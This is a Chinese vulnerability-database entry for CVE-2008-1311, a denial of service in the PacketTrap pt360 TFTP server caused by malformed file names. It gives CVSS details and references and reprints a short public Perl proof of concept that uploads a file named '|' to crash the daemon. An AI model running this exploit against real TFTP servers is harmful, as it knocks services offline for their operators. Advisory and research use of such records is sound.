| CVE-2008-1311 |
|
发布时间 :2008-03-12 13:44:00 | ||
| 修订时间 :2011-03-07 22:06:29 | ||||
| NMCOE |
[原文]The TFTP server in PacketTrap pt360 Tool Suite PRO 2.0.3901.0 and earlier allows remote attackers to cause a denial of service (daemon hang) by uploading a file named (1) ‘|’ (pipe), (2) ‘”‘ (quotation mark), or (3) “<>” (less than, greater than); or (4) a file with a long name. NOTE: the issue for vector 4 might exist because of an incomplete fix for CVE-2008-1312.
[CNNVD]PacketTrap pt360工具组TFTP服务器远程拒绝服务漏洞(CNNVD-200803-203)
PacketTrap pt360工具组是一款网络管理软件,可提供Cisco配置管理、服务器和应用程序监控、第三方产品集成等功能。
pt360工具组所实现的TFTP服务器处理无效文件名的文件时存在拒绝服务漏洞,导致TFTP组件无法正常运行,用户必须重启整个应用才能恢复。
–
CVSS (基础分值)
| CVSS分值: | 5 | [中等(MEDIUM)] |
| 机密性影响: | NONE | [对系统的机密性无影响] |
| 完整性影响: | NONE | [不会对系统完整性产生影响] |
| 可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
| 攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
| 攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
| 身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
| CWE-20 | [输入验证不恰当] |
–
CPE (受影响的平台与产品)
| 产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
| 未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
|
http://xforce.iss.net/xforce/xfdb/41073 (UNKNOWN) XF pt360-tftpserver-filename-dos(41073) |
|
http://www.vupen.com/english/advisories/2008/0811/references (UNKNOWN) VUPEN ADV-2008-0811 |
|
http://www.securityfocus.com/bid/28187 (UNKNOWN) BID 28187 |
|
http://www.securityfocus.com/archive/1/archive/1/489355/100/0/threaded (UNKNOWN) BUGTRAQ 20080310 Denial of Service in PacketTrap TFTP server 2.0.3901.0 |
|
http://securityreason.com/securityalert/3734 (UNKNOWN) SREASON 3734 |
|
http://secunia.com/advisories/29308 (VENDOR_ADVISORY) SECUNIA 29308 |
|
http://aluigi.org/testz/tftpx.zip (UNKNOWN) MISC http://aluigi.org/testz/tftpx.zip |
|
http://aluigi.altervista.org/adv/packettrash-adv.txt (UNKNOWN) MISC http://aluigi.altervista.org/adv/packettrash-adv.txt |
–
漏洞信息
| PacketTrap pt360工具组TFTP服务器远程拒绝服务漏洞 | |
| 中危 | 输入验证 |
| 2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
| 远程 | |
| PacketTrap pt360工具组是一款网络管理软件,可提供Cisco配置管理、服务器和应用程序监控、第三方产品集成等功能。 pt360工具组所实现的TFTP服务器处理无效文件名的文件时存在拒绝服务漏洞,导致TFTP组件无法正常运行,用户必须重启整个应用才能恢复。 |
|
–
公告与补丁
|
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.packettrap.com/index.html |
–
漏洞信息 (6863)
|
PacketTrap TFTPD 2.2.5459.0 Remote Denial of Service Exploit (EDBID:6863) |
|
| windows | dos |
| 2008-10-29 | Verified |
| 0 | Jeremy Brown |
N/A |
[点击下载] |
#!/usr/bin/perl # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # PacketTrap TFTPD DoS (latest 2.2.5459.0 tested) -- www.packettrap.com # Must have Net::TFTP installed (easy to install, 'cpan' then 'install Net::TFTP' ;) # A product of tftpfuzz.pl (coming soon) use Net::TFTP; use Getopt::Std; $tftp = Net::TFTP->new("192.168.0.112"); $tftp->ascii; $tftp->put("test", "|"); exit; # milw0rm.com [2008-10-29]
–
漏洞信息
42932 |
|
| PacketTrap pt360 TFTP Server Crafted Filename Handling Remote DoS | |
Remote / Network Access |
Denial of Service |
| Loss of Availability | |
| Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
–
时间线
2008-03-08 |
Unknow |
| 2008-03-08 | Unknow |
–
解决方案
| OSVDB is not aware of a solution for this vulnerability. |
–
相关参考
|
–
漏洞作者
| Unknown or Incomplete |



![[娱乐] 超女厉娜竟是靠贞操晋级5强的-微慑信息网-VulSee.com](http://8341.b.lunqun.com/attachment/m127/28/69/28692/Type_jpg/18892_6471_7483f150a147cad.jpg)


![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
